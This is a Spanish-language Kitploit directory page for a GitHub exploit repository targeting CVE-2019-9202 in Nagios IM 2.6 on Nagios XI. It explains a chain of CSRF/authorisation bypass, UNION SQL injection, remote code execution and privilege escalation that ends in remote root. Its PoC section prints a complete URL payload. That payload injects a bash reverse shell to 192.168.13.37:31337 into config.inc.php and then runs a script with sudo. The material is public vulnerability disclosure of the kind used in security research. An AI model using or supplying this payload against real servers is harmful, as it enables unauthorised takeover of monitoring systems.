Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-9202 — Nagios IM 2.6 exploit de ejecución remota de código: CSRF + SQLi + RCE + LPE --> root remoto | Kitploit
Herramientas/GitHubGitHub/polict/cve-2019-9202
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubpolict/cve-2019-9202

CVE-2019-9202

Nagios IM 2.6 exploit de ejecución remota de código: CSRF + SQLi + RCE + LPE --> root remoto

Ver Repositorio
4hace 7 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2019-9202

Exploit de ejecución remota de código en Nagios IM 2.6: CSRF + SQLi + RCE + LPE → root remoto

Descripción

Encadenando una falsificación de petición entre sitios (CSRF) / omisión de autorización (CVE-2019-9203) es posible explotar una inyección SQL basada en UNION (CVE-2019-9204), una ejecución remota de código (RCE) (CVE-2019-9202) y una escalada de privilegios local (LPE) (CVE-2019-9166), obteniendo privilegios de root en un servidor Nagios XI remoto.

Requisitos

La víctima debe estar autenticada en Nagios XI; por lo que sé, los privilegios más bajos son suficientes.

PoC

http://nagiosxi.local/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=&incident_id='union%20select%201,2,3,4,"';echo%20%27print%28\"bash+-i+%3e%26+/dev/tcp/192.168.13.37/31337+0%3e%261+%23\"%29%3b'%3e%3e+/usr/local/nagiosxi/html/config.inc.php%3b+sudo+/usr/local/nagiosxi/scripts/repair_databases.sh%3b%23",6,7,8,'x

Descargar herramienta